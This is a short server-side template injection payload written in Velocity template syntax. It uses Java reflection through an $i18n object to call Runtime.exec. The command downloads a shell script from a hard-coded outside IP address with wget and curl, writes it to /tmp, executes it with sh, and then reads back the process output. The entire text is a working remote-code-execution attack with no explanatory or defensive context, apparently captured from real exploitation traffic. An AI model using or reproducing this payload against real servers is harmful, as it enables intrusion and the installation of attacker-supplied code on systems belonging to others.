#set($ex=$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('wget http://89.221.52.122/s.sh -O /tmp/s.sh;curl http://89.221.52.122/s.sh -L > /tmp/s.sh;sh  /tmp/s.sh'))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$out.read()
#end
